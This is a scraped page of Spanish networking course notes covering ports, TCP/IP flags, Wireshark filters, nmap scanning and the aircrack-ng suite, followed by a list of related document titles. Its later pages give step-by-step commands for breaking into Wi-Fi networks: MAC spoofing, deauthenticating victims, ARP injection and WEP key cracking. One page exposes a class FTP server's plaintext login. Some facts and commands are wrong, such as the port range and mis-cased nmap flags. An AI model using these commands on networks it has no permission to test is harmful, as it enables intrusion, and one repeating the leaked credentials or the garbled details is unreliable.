19 Modulación: Cada canal o medio, transmite bien una serie de frecuencias y mal otra. Necesitamos dispositivos que transformen la frecuencia de la señal para que se transmita eficientemente la señal por el cable. Adecua la señal al medio físico, pero no varia la naturaleza de la señal. ANTENAS Según los ingenieros: λ para una frecuencia antena problemas en el cuaderno. Espectro de las ondas electromagnética. --- cuaderno TCP-UDP Son los dos grandes grupos de protocolo que se utiliza en las comunicaciones. TCP (Transmision Control Protocol) que es un protocolo orientado a conexión, y significa que tienen cierto control de la conexión. Necesita confirmación de la conexión por ambas partes. UDP (User Datagrama Protocol) es un protocolo no orientado a conexión. No necesita confirmación de la conexión, es decir, que el destinatario no tiene porque confirmar la receptición. PUERTOS LÓGICOS Usaban 8 bits, actualmente ya usan 16bits, y el numero de puertos que se pueden utilizar con 16bits son puertos(desde el 0 hasta el 56535). Los puertos se dividen en dos zonas: Menos de Normalmente son puertos protegidos. Están orientados a un tipo de protocolo. Estos son algunos puertos: Puerto 0: TCP-UDP. es reservado, no podemos usarlo. Puerto 1: TCP. Es un multiplexador de servicios. Puerto 5: TCP. Entrada de trabajo remoto. Puerto 7 echo : TCP-UDP. Eco. Puerto 9 discard: TCP-UDP. Descartar. Descarta toda la información que había recibido. Puerto 11 users: TCP-UDP. Usuarios activos. Puerto 13 daytime: TCP-UDP. Hora del día. Puerto 15 : TCP-UDP. Programar el estado de la red. Puerto 17 quote : TCP-UDP. Cita del dia, mandar un mensaje a alguien para hacer algo. Puerto 19 chargen: TCP-UDP. Generador de caracteres. Puerto 20 ftp-data: TCP. Protocolo de transferencia de archivos. Petición de descarga. Puerto 21 ftp : TCP. Es el puerto por el que recibe los archivos. Puerto 23 telnet: TCP. Conexión de terminal o consola. Puerto 25 smtp: TCP. Protocolo de transporte de correo sencillo. Protocolo de enviar correos. Puerto 37 time: TCP-UDP. Puerto 42 nameserver : TCP-UDP. Servidor de nombres de servidores. Le dice al equipo quienes son los servidores. Puerto 43 nicname: TCP-UDP. Le dice a los servidores quienes son los equipos..

20 Puerto 53 dns: TCP-UDP. Servidor de nombres de domino. Puerto 67 bootstrap: UDP. Servidor. Puerto 68 bootstrap: UDP. Cliente. Activación de la tarjeta de red para arrancar un equipo. Puerto 69 tftp: UDP. Es un FTP trivial. Es como una versión resumida del FTP. Manda un equipo a otro sin informar al receptor. Puerto 70 gopher: TCP. Es u nprotocolo de internet. Gophe:// Puerto 77 : TCP. Privado. Puerto 79 finger: TCP. Es un protocolo de internet. Finger:// Puerto 80 http (www): Hyper Text Transport Protocol. TCP. Son las paginas web. Puerto 93 dcp: TCP. Device Control Protocol. Protocolo de control de dispositivos. Si esta activo es que algun dispositivo se puede controlar desde remoto. Puerto 103 X400: TCP. Recibe correos X400. Puerto 104 X400send:TCP. Envía correos X400. Puerto 110 POP3: TCP. Recibe correo electronico. Post Office Protocol. Puerto 111 sunrp:tcp-udp. Llamada procedimiento remoto(rp) de SUN. Puerto 113 auth: TCP. Servicio de autentificación. Puerto 119 nntp : TCP. Transferencia de noticias. Es un protocolo de internet news:// Puerto 123 ntp : UDP. Protocolo de tiempo de red. Puerto 139 netbios: TCP. Protocolo de sesión NetBios. Protocolo de Microsoft para entenderse entre equipos de una red. Puerto 525 timeserver: UDP. Servidor de hora. Puerto 3306 : es tcp. MySql. Es el servidor de base de datos en MySQL... Puerto 3389: TCP.Es el administrador remoto de los sitemas WindowsNT. Mas de FLAGS: URG : Indica urgencia, es decir, cuando URG tiene un 1 significa que es relevante lo que pone en Urgent Pointer, si esta a 0, no tiene información el Urgent Pointer ACK : Reconoce una recepción correcta. Si esta a 1 se lee el campo Número de Confirmación, si esta esta a 0 no se lee. PSH: Push. Indica al receptor que elimine rápidamente el encabezado y los datos se lo pase a la aplicación, esto lo hace cuando esta en 1, es decir activado. RST: Reset. Si el bits esta activo, se reinicia la conexión en caso de error. SYN: Syncronize. Es el bit que marca el inicio de sesión, es decir, cuando esta activo y ACK no, el número de secuencia es el primero de la secuencia de paquetes. FIN: Finish. Cuando este bit esta activo, indica que es el ultimo paquete. DATAGRAMAS. Son paquetes de información que envían los ordenadores. Cada protocolo tiene su sistema de envío de datagramas. TCP: Posiciones de los bits del datagrama: Excel > datagramas.

21 En este protocolo, para transmitir necesitamos que ambos equipos estén de acuerdo en la comunicación. Esto se conoce como Conexión(negociación) en tres pasos: 1- El cliente manda un paquete con SYN=1, y un número de secuencia. 2- El servidor conesta con un paque con el SYN=1 y ACK=1, y pone otro número de secuencia y el inicial lo escribe en el campo confirmación. 3- El cliente manda el ACK=1 y en el número de confirmación pone el número de secuencia que envío el servidor. Durante la conexión, cada datagrama que se envia con el SYN=1, y se recibe confirmación con el ACK=1. El fin de la conexión se llama Negociación en cuatro pasos: 1- Uno manda el bit FIN=1. 2- El otro responde con el ACK=1 3- El primero responde con FIN=1 y ACK=1 4- Se acaba la conexión enviando el segundo con FIN=1 y ACK=1. Normalmente este ultimo paso ya no sirve, porque la conexión se suele cerrar en el paso 3. UDP: En este protocolo nadie pregunta por la recepción de los paquetes, y se utiliza para conexiones donde no importa perder algún paquete. Se usan mucho para las transmisiones de sonido y vídeo. Esquema > excel - datagramas No tienen un campo para el numero de secuencia, normalmente este protocolo utiliza parte de los datos para enviar el numero de secuencia, necesario para ordenar los paquetes en destino. La parte que se utiliza, son los primeros bits de los datos. Para saber cuando es el ultimo paquete, al menos tiene una linea entera de 0 al final, el paquete que tenga la última linea en 0, es el último paquete. ICMP (Internet Control Message Protocol): Se utiliza para transmitir mensajes entre equipos, de error, de fallos... Un usuario malintencionado podria utilizar este protocolo para mandar datos y mandar instrucciones al equipo. Son por ejemplo la instrucción PING. Esquema > excel datagramas Tipos: 0 Es el eco. Cuando realizas una llamada a un equipo y contesta. No lleva datos. 3 Destino inaccesible. 4 Disminución de origen. 5 Petición de redirección. 8 Solicitud de Eco. (PING) 11 Tiempo excedido en un datagrama. 12 Hay un problema con parámetros en un datagrama. 13 Solicitud de Timestamp(tiempo transcurrido en segundos desde el 1 de enero de 1970). 14 Respuesta de timestamp. 17 Solicitud de máscara de red. 18 Respuesta de máscara de red. IP:

22 Flags 1º- siempre es 0 2º DF- No fragmentación. Si se especifica este bit dice que el paquete es único (0100) 3º MF- Campo de verificación. Para verificar que el datagrama llega completo a su destino. Cuando este activo se lee con mucho cuidado la longitud total, se leen los campos encapsulados de cuantos van a ser y se enviara confirmación de que esta entero. Hay un datagrama del archivo mandado en el que esta este bit a cero, y es el ultimo. 4º es reservado. Protocolo: 1: ICMP 2: IGMP 6: TCP 17:UDP 115: L2TP > Usuario ftp servidor de clase: Carpeta personal. Dirección: ftp://fesbierzo.systes.net/cursowifi (exterior) /cursowifi (clase) Usar Filezilla para subir y bajar archivos FTP. Tamaño maximo 1Gb. User : wifi Password : fes$wifi WIRESHARK Filtro de captura: host ip (rastrea esa ip) Especificar un protocolo: Muestra los paquetes que incluyan ese protocolo. Poner unicamente el nombre protocolo que queremos especificar. Especificar puerto o rango de puertos: tcp.port == 80. Esto analizaria los paquetes del puerto 80. Par aun rango tcp.port > 1025 and tcp.port<2010. Especificar un equipo: ip.addr == ip. La comunicación que se establezca entre tu equipo y el otro. Para especificar un rango ip.addr==ip.0/24 Especificar la fuente: ip.src == ip Especificar destino:ip.dst == ip Protocol.srcport == puerto. Escanearia todas las solicitudes que viniesen por ese puerto del protocolo seleccionado. Negaciones : not tcp : mostraria todo lo que no fuese tcp not ip.addr == ip.. mostraria todo lo que no tenga que ver con esa ip. En nuevas versiones la negación sirve :! Sirven todas las operaciones condicionales : and, or, xor.

23 NMAP. Su entorno gráfico es ZENMAP. Utiliza un sistema de librerías (winpcap (windows) y pcap(linux/mac)). Estructura del comando: nmap [tipos de escaneo] [opciones] [equipo/s a atacar] Opciones: -T nº : esto es para forzar el time. Los valores son { }, cuanto mas alto el numero, mas rapido el escaneo, y cuanto mas bajo, mas lento. Sirve para hacer ataques masivos con los tiempos altos. Y para ataques sigilosos números bajos. Por defecto el time es el 3. -st: hace una llamada al sistema de conexión, sirve para hacer una conexión con todos los puertos, si el puerto esta abierto a la escucha, se conecta. -ss: Sigiloso. Sirve para minimizar el ruido que produce el programa. Inicia una conexión pero no la acaba. Manda un SYN, recibe un SYN y ACK, y termina la conexión. Al no terminar la conexión los ordenadores normales no registran esta petición al puerto. -sp: es un ping. Si eres administrador, manda en paralelo un paquete ICMP, y en vía paquetes con SYN y ACK (paquetes de respuesta). Se usa para detectar equipos en tu red. -su: se utiliza para saber que puertos UDP hay activos. En los sistemas UNIX no van a funcionar correctamente, en servidores. -sf : Manda el bit FIN activo. -sx : Xmas. Manda una trama en árbol. Principalmente para detectar sistemas operativos. -sn : Null. Intenta establecer una conexión nula, aunque en realidad esta mandando paquetes de cortes de conexión. La utilidad de estos tres, es en el caso de que el puerto este cerrado, ya que si le mandas una trama de finalización, los puertos cerrados dan respuesta y los abiertos no. Aunque en los servidores windows, no suele funcionar correctamente. -PTnº: numero de puerto, la forma correcta seria nmap -PTnº. Esto aria el escaneo seleccionado detrás al puerto seleccionado. La P es porque manda una comunicación TCP (ping) al puerto seleccionado. -R: es lo mismo que poner --dns-servers [ip-dns, ip-dns1...], pregunta en todos los servidores DNS. -O: informa sobre el sistema operativo. Algunas veces no puede, ya que los servidores suelen engañar sobre su S.O. nmap --osscan-guess nºip: muestra el S.O que mas se le parece al sistema operativo utilizado por el servidor, siempre que no descubra el que es. -p nº puerto, nºpuerto, nºpuerto-nºpuerto. Escanearía los puertos seleccionados. Los separados por se corresponde por rangos de puertos. -sv: intenta descubrir la versión de los servicios que se están usando en cada puerto. -v : mucha información, modo Vervose. Se pone detrás de cualquier conjunto, y nos muestra información adicional. Cuantas mas pongas, mas información obtendrás. -p0: No hacer ping. -p-: Indica todos los puertos, o lo que es lo mismo, escanearia todos los puertos. -PR: manda un ping ARP, de capa básica de red, y que esta activo si la tarjeta de red esta activa. Decoy (-D): engaño nmap -p 25,53 -sx -P0 -D , nºip: Inidicamos los puetos que queremos atacar, con escaner Xmas, y un no ping, con un Decoy. Los siguientes numero son IPS de otros equipos, pudiendo incluir la el mismo ordenador. Y al final la IP del equipo atacar. Estas Ips que ponemos son Ips desde las que atacar, quedando todas las ip registradas en los log. Si queremos usar algun shellscript creado para su utilización en nmap, tenemos que poner: nmap --script nom_script [opciones] nºip Algunos de los script son: nmap --script smb-os-discovery -p 445 nºip:intenta descubrir las vulnerabilidades y versiones de NetBios de los equipos windows, si es en un equipo Linux, informaría la versión del samba utilizado.

24 Ejemplos: nmap -ss P0 -sv -O : es una exploración intentando informar el S.O, las versiones del software hay en cada puerto, hace un ping nulo, es decir no va ha dejar secuencia, y el modo sigiloso para no dejar logs. Escaneo general sin hacer mucho ruido. nmap -st -n -p- -P : no manda ping, mira en todos los puertos, y no busca DNS (-n) para no dejar logs de petición en el servidor de DNS. Y con -st, nos intentamos conectar a todos los puertos. nmap -T5 -F -O -il archivo.txt: usado para detectar un sistema operativo. La opción -il. Realiza una lectura linea a linea del archivo seleccionado y la añade a la linea de comando. En el archivo seleccionado, podemos poner no solo las IP (una por linea) sino que los comandos deseados para esa IP. nmap -sv -n -P0 nºip -p22: tambien funciona poniendo los puertos a escanear al final del comando. nmap -sp -PR nºip: manda un ping ARP a la ip seleccionada. AIRCRACK-ng Instalar AIRCRACK-NG. Instalar tambien el macchanger. Programas de la suite aircrack-ng: 1- airmon-ng <start stop> <dispositivo> [canal]: Sirve para poner el modo monitor de la tarjeta. Una vez puesta en modo monitor, seguramente se creara una tarjeta virtual. ejem: airmon-ng start wifi0. Para poner la tarjeta en modo monitor sin usar aircrack-ng ifconfig wifi0 down : desconectar la tarjeta, iwconfig wifi0 mode [managed ad-hoc master monitor] if config wifi0 up 2- airodump-ng [opciones] <nom_dispositivo>: es el capturador de paquetes. Opciones: - - ivs : captura solo los vectores de inicialización, que son tramas de 24 bits. Sirve para ahorrar espacio en disco. Muy común para romper la contraseña de wi-fi. - -gpsd : para usar un gps. - -write (-w) <nom_archivo>: es el archivo de captura. Se tiene que poner el nombre del archivo. - -beacons: significa balizas. Señales que emiten los AP, router y antenas inalámbricas. Puede ser util para la utilización con GPS. - -chanel (-c) : Canal. Indicar el canal en el que queremos hacer la captura. -a : captura en la frecuencia de 5GHz. -abg : mira todas las frecuencias del rango a, b, g airodump-ng - -ivs -w prueba -c 11 -abg wifi0 : va a guardar un archivo con extensión.ivs con el nombre de prueba, rastreando el canal 11, realizano un salto de frecuencias entre los correspondientes a, b, g. airodump-ng -w prueba -c9 wifi0 : capturaría paquetes del canal 9, almacenándolos en un archivo.cap.

25 Airdump-ng muestra lo siguiente: CHX [DURACION BATERIA] [FECHA] BSSID PWR Beacons #Data CH MB EA/C ESSID La MAC del router Intensidad de señal Balizas Nº paquetes capturados Canal Tasa de transferencia Tipo encriptaciónnombre de red. OPN: ABIERTA WEP WPA WPA2 WPA-PSK WPA2-PSK aireplay-ng :se usa para inyectar trafico, cancelar autentificaciones(para obtener clave wpa) Ataques: 0- Desautentificación. Desconectar a un usuario de ese router, por lo que canta demasiado. 1- Autentificacion falsa. Te conectas al router o AP con una MAC falsa. 2- Selección del paquete a enviar 3- Reinyección ARP. 4- Chop-chop. Algoritmo Korek. Utiliza el algoritmo para averiguar trama de conexión directa de las tarjetas, usando CRC. Aireplay-ng a 00:11:22:33:44:55 -c 55:44:33:22:22:11 wifi0 0 : desautentificacion del cliente -a : mandar MAC del punto de acceso. -c : mandar la MAC del cliente al que quieres desenganchar. Si no especificas nada, desengancha a todos. Con aerodump en otra ventana. Aireplay-ng a MACap wifi0 aireplay-ng -3 -b MACap -h MACcliente :O:NUESTRA WIFI0 Esta combinación se llama reinyección ARP. El primer comando elimina a todos de la red, y luego el segundo inyecta paquetes hasta artarse. AIRCRACK-NG [OPTIONS] <ARCHIVOS-QUE CAPTURASTE CON AIRODUMP> -A ( AMODE):FUERZA EL ATAQUE (1= WEP; 2 =WPA-PSK -E (essid): solo lee paquetes los de ese ESSID. -b (Bssid): indicar la mac del atacado -q (quiet) : activa el modo silencioso, no muestra nada en pantalla hasta que la encuentre. -c : limita a caracteres alfanuméricos. -t :limita a caracteres hexadecimales. -h : solo numeros. -d<algoenhexadecimal> : busca solo claves que empiecen por ese texto. -m : igual que -b. Con -m ff:ff:ff:ff:ff:ff busca todas las MAC. -n {64 128} : para indicarle si la contraseña es de 64 o de 128 bits. CAMBIAR MAC DE TARJETA. Sudo ifconfig wlan0 down sudo ifconfig wlan0 hw ether MAC:Nueva sudo ifconfig wlan0 up

26 Cambiar ip con MACCHANGER sudo macchanger wlan0 MAC:NUEVA Si no funciona: Sudo ifconfig wlan0 down sudo macchanger wlan0 MAC:NUEVA sudo ifconfig wlan0 up Pasos para hackear red wifi: 1 -Ifconfig Iwconfig : para inalambrica Apuntar el nombre de nuestro dispositivo inalámbrico. 2- Si esta apagada, la ponemos a funcionar. Ifconfig nom_dispositivo up 3- airmon-ng start nom_dispositivo. Para poner la tarjeta en modo monitor. Crea una tarjeta virtual mon0. iwconfig, para comprobar si la tarjeta virtual esta arrancada, sino: airmon-ng start mon0 : no tiene porque ser necesario. 4- Cambio de MAC: ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up 5- airodump-ng mon0 : lista todos los paquetes. Apuntamos los datos BSSID PWR CH ENCRIPTACION y ESSID Cuando eligamos la red que deseamos, paramos airodump-ng con CONTROL-C 6- airodump-ng -c x -bssid mac_victima -w nom_archivo man0 : obtiene los paquetes de el canal elegido. Airodump-ng mon0 -w nom_archivo. si queremos los pasos 7 y 8 no los hacemos si hay trafico en la red. 7- Abrir nueva consola. aireplay-ng e nom_essid -a MAC_router -h mac_tar_red mon0 : es una falsa autentificacion. Si todo va bien, al final de una serie de letras, aparece sucessful :) 8- Si los datas (airodum-ng) suben despacio, tenemos que inyectar: aireplay-ng -3 -b MAC_router -h Mac_tar_red mon0: inyección ARP. Dejar que el numero de ARP. Si tienes muchos (120000), es que estas inyectando, sino, es que no estas inyectando. 9- Abrir nueva consola. aircrack-ng nom_fichero*.cap. Y dejarlo funcionando. Hasta que te de la clave. Aparece xxxxxxx mac_aparato, clave. INYECCION Cambio de MAC: ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0

27 ifconfig mon0 up AIREPLAY-NG -FAKEAUTH 0 -e nom_essid -a mac_victima -h mac_nuestra mon0. : Manda paquetes y sale un mensaje de... sucessfull :). método vago: aireplay-ng - -arpreply -b BSSID -h mac_nuestra mon0. Método agresivo, quita a todo dios. Aireplay-ng - -deauth 5 -a MAC_victima -c mac_nuestra mon0 FILTRADO MAC: Para saltarse le filtrado MAC de un router configurado con MAC necesitamos: 1- Si tiene el filtrado por MAC necesitmaos obtener una MAC válida de un cliente. Observando atentamente la salidas de airodum-ng. Para mandar una desautentificación, tiene que estar el equipo atacado, dentro de tu area de alcance. 2- Necesitamos el rango de IP, ya que sino no podemos conectarnos a esa. Proceso: Captura...cap (fichero de captura de paquetes). Están cifrados por la clave. WIRESHARK para descifrar el archivo: edit/preferences/protocols

GNU/Linux Administración Básica

GNU/Linux Administración Básica Networking Quality and Security 22 de marzo de 2006 Parte I Administración básica Directorios básicos Sistema / Directorio raíz. El resto de directorios cuelgan de él. /bin Mandatos binarios esenciales

Más detalles

CONCEPTOS BASICOS. Febrero 2003 Página - 1/10

CONCEPTOS BASICOS. Febrero 2003 Página - 1/10 CONCEPTOS BASICOS Febrero 2003 Página - 1/10 EL ESCRITORIO DE WINDOWS Se conoce como escritorio la zona habitual de trabajo con windows, cuando iniciamos windows entramos directamente dentro del escritorio,

Más detalles

Fedora Core GNU/LINUX

Fedora Core GNU/LINUX Fedora Core GNU/LINUX Entrega 8 Comandos básicos man Mostrar paginas de manual de otros comandos. man ls clear Limpia la pantalla. clear ls touch Listar los archivos y directorios de una ruta especifica.

Más detalles

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX En este manual se presenta el proceso de configuración de una Maquina Virtual en VirtualBox, que será utilizada para instalar un Servidor

Más detalles

TUTORIAL DE AIRCRACK-NG

TUTORIAL DE AIRCRACK-NG TUTORIAL DE AIRCRACK-NG Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.- Paolo Norambuena paolo.norambuena@gmail.com AIRCRACK-NG Esta es una guía con fines educativos para el uso y manipulación

Más detalles

WEP, WPA/WPA2 Cracking

WEP, WPA/WPA2 Cracking WEP, WPA/WPA2 Cracking By: Alfa-Omega Introduccion En este manual explicare como crackear claves wep, wpa y wpa2, para ello utilizare el live cd de backtrack 3 (beta) y la suite aircrack (la suite aircrack

Más detalles

UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX

UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX Eduard Lara 1 1. INTRODUCCIÓN En los sistemas GNU/LINUX y UNIX los dispositivos como los discos duros y sus particiones, el terminal de pantalla,

Más detalles

ANÁLISIS DE HERRAMIENTAS PARA CLONAR DISCOS DUROS

ANÁLISIS DE HERRAMIENTAS PARA CLONAR DISCOS DUROS ANÁLISIS DE HERRAMIENTAS PARA CLONAR DISCOS DUROS Descripción y características: Clonezilla es un particionador o clonador de discos, similar a Norton Ghost que guarda y restaura bloques sólo se usa en

Más detalles

Práctica 1: Herramientas básicas:

Práctica 1: Herramientas básicas: Práctica 1: Herramientas básicas: En esta práctica veremos las siguientes herramientas: Conexión a Terminal remoto Conexión a escritorio remoto Otras herramientas Duración: 1 sesión de 2 5 horas Conexión

Más detalles

TEMA 5 SISTEMA/ ADMINISTRACIÓN AUTORIZACIÓN.

TEMA 5 SISTEMA/ ADMINISTRACIÓN AUTORIZACIÓN. SISTEMA/ ADMINISTRACIÓN AUTORIZACIÓN. TEMA 5 En esta pantalla están configuradas las autorizaciones existentes para realizar modificaciones en la configuración de la pantalla Gnome, audio, zona horaria,

Más detalles

Migración de disco duro en Debian GNU/Linux Wheezy

Migración de disco duro en Debian GNU/Linux Wheezy Migración de disco duro en Debian GNU/Linux Wheezy Rafalinux 1 de enero de 2013 Hace unas semanas me cascó la fuente de alimentación y la placa base. Desafortumadamente tuve que cambiar prácticamente toda

Más detalles

Notas para la instalación de un lector de tarjetas inteligentes.

Notas para la instalación de un lector de tarjetas inteligentes. Notas para la instalación de un lector de tarjetas inteligentes. Índice 0. Obtención de todo lo necesario para la instalación. 3 1. Comprobación del estado del servicio Tarjeta inteligente. 4 2. Instalación

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor Web Apache Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor Web

Más detalles

Soporte Técnico Prof. Héctor Herrera. Instalando Fedora 17 en la misma máquina virtual.

Soporte Técnico Prof. Héctor Herrera. Instalando Fedora 17 en la misma máquina virtual. Instalando Fedora 17 en la misma máquina virtual. Vamos a instalar Linux Fedora 17 para tener dos sistemas operativos en la misma máquina virtual. Existe por cada Linux un DVD y un CD de instalación, en

Más detalles

Gestión de discos duros en Linux

Gestión de discos duros en Linux Este documento está bajo licencia Creative Commons Trabajo realizado por: José Ignacio Mardomingo Chacón Gestión de discos duros en Linux 1.-Inserta un nuevo disco y crea dos particiones con distinto tipo

Más detalles

GUIA COMPLEMENTARIA PARA EL USUARIO DE AUTOAUDIT. Versión N 02 Fecha: 2011-Febrero Apartado: Archivos Anexos ARCHIVOS ANEXOS

GUIA COMPLEMENTARIA PARA EL USUARIO DE AUTOAUDIT. Versión N 02 Fecha: 2011-Febrero Apartado: Archivos Anexos ARCHIVOS ANEXOS ARCHIVOS ANEXOS Son los documentos, hojas de cálculo o cualquier archivo que se anexa a las carpetas, subcarpetas, hallazgos u otros formularios de papeles de trabajo. Estos archivos constituyen la evidencia

Más detalles

EL MODELO DE ESTRATIFICACIÓN POR CAPAS DE TCP/IP DE INTERNET

EL MODELO DE ESTRATIFICACIÓN POR CAPAS DE TCP/IP DE INTERNET 1 EL MODELO DE ESTRATIFICACIÓN POR CAPAS DE TCP/IP DE INTERNET La familia de protocolos TCP/IP fue diseñada para permitir la interconexión entre distintas redes. El mejor ejemplo es Internet: se trata

Más detalles

TEMA 2: GESTIÓN DE ARCHIVOS

TEMA 2: GESTIÓN DE ARCHIVOS Tema 2: Gestión de archivos. GNU/LINUX 1/6 TEMA 2: GESTIÓN DE ARCHIVOS Este tema cubre la gestión básica del sistema de archivos (archivos, directorios y links) de GNU/LINUX mediante las órdenes disponibles

Más detalles

Firewall Firestarter. Establece perímetros confiables.

Firewall Firestarter. Establece perímetros confiables. Firewall Firestarter Qué es un Firewall? Un muro de fuego (firewall en inglés) es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo

Más detalles

Configuración de los servidores de los institutos con raid (Institutos nuevos)

Configuración de los servidores de los institutos con raid (Institutos nuevos) Configuración de los servidores de los institutos con raid (Institutos nuevos) Índice de contenido Introducción...1 Copiar la estructura de particiones desde sda a sdb:...2 Asignar las particiones en sdb

Más detalles

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)

Más detalles

Creacion de Script. Que es un Script?

Creacion de Script. Que es un Script? Creacion de Script Que es un Script? Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución,

Más detalles

TP N 7 Comandos "mount" y "umount"

TP N 7 Comandos mount y umount Taller de GNU/Linux 2002 TP7 hoja 1/5 Universidad Nacional de La Matanza Ingeniería en Informática-Taller de GNU/Linux TP N 7 Comandos "mount" y "umount" Objetivos: Comprender los nombres utilizados por

Más detalles

Guía de instalación de LliureX 5.09

Guía de instalación de LliureX 5.09 Guía de instalación de LliureX 5.09 Introducción La distribución LliureX está basada en Sarge, la versión estable de Debian GNU/Linux. Esta guía pretende ayudar al usuario en el proceso de instalación

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor FTP Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor FTP FTP (File

Más detalles

Servidor DNS sencillo en Linux con dnsmasq

Servidor DNS sencillo en Linux con dnsmasq Servidor DNS sencillo en Linux con dnsmasq Introducción El paquete dnsmasq permite poner en marcha un servidor DNS de una forma muy sencilla. Simplemente instalando y arrancando el servicio dnsmasq, sin

Más detalles

Podemos descargar la distribucion de gnu/linux de los repositorios de Ubuntu http://releases.ubuntu.com/.

Podemos descargar la distribucion de gnu/linux de los repositorios de Ubuntu http://releases.ubuntu.com/. Instalación GNU/Linux Ubuntu -10.04.3-server-i386 Con la ayuda de este sencillo manual podemos ver como instalar Un servidor GNU/Linux, en este caso utilizaremos la distribución Ubuntu -10.04.3-server-i386

Más detalles

Actividad 1: Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores) (I).

Actividad 1: Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores) (I). PRÁCTICAS SRI TEMA 5 (SERVIDOR FTP) Actividad 1: Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores) (I). 1. Iniciamos sesión con un usuario nombre (miguel)

Más detalles

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA ASALTANDO REDES WI-FI WEP / WPA Aetsu alpha.aetsu@gmail.com Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Cifrado WEP Todos los ataques En esta parte del manual explicaré de forma

Más detalles

Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado)

Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado) Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado) Contenido Instrucciones para la instalación.... 1 Requisitos del sistema........... 1 Código de autorización..........

Más detalles

Tutorial: Primeros Pasos con Subversion

Tutorial: Primeros Pasos con Subversion Tutorial: Primeros Pasos con Subversion Introducción Subversion es un sistema de control de versiones open source. Corre en distintos sistemas operativos y su principal interfaz con el usuario es a través

Más detalles

Capítulo 2. Cuestiones previas

Capítulo 2. Cuestiones previas 2.1. Creación del CD de Knoppix a partir de la ISO El CD de Knoppix puede ser descargado desde Internet. (Vea el capítulo anterior: www.victoralonso.com (http://www.victoralonso.com/knoppix/)). El resultado

Más detalles

COPIAS DE SEGURIDAD AUTOMÁTICAS DE DIRECCIONES CALLEÇPAÑA

COPIAS DE SEGURIDAD AUTOMÁTICAS DE DIRECCIONES CALLEÇPAÑA COPIAS DE SEGURIDAD AUTOMÁTICAS DE DIRECCIONES CALLEÇPAÑA Autor: Carlos Javier Martín González. Licenciado en Física Teórica por la Universidad Autónoma de Madrid. Analista programador y funcional. Desarrollador

Más detalles

Administración de GNU/Linux

Administración de GNU/Linux Administración de GNU/Linux Curso de Utilización y Administración avanzada de sistemas GNU/Linux y aplicaciones de Software Libre para estudiantes universitarios Pablo Cabezas Mateos Índice Qué debe conocer

Más detalles

aula) 1. Introducción 2. Instalación en el servidor

aula) 1. Introducción 2. Instalación en el servidor GUÍA DE UTILIZACIÓN de ControlAula Guía de instalación y utilización de ControlAula desde LliureX (modelo de aula) 1. Introducción ControlAula es una herramienta para los profesores que les permite llevar

Más detalles

Linux Principios básicos de uso del sistema [4ª edición]

Linux Principios básicos de uso del sistema [4ª edición] Introducción 1. Historia de Unix 11 2. GNU 13 2.1 FSF 14 2.2 CopyLeft y GPL 14 3. Linux 16 3.1 Características 18 3.2 Distribuciones 20 4. Qué distribución elegir? 20 4.1 Las distribuciones para el "gran

Más detalles

Servidor FTP en Ubuntu Juan Antonio Fañas

Servidor FTP en Ubuntu Juan Antonio Fañas Qué es FTP? FTP (File Transfer Protocol) o Protocolo de Transferencia de Archivos (o ficheros informáticos) es uno de los protocolos estándar más utilizados en Internet siendo el más idóneo para la transferencia

Más detalles

Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware

Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware 1. Tipos de conexiones de red Los software de virtualización son programas que se utilizan para crear y manejar máquinas virtuales,

Más detalles

Uso básico de la terminal

Uso básico de la terminal Uso básico de la terminal Comandos básicos El CLI más utilizado en Linux se llama GNU/Bash (o solo Bash --Bourne Again Shell) algunas variables y comandos que son de utilidad son:. ruta actual ~ home del

Más detalles

Utfsm jmc. SO Linux. Redes. Miguel Varas

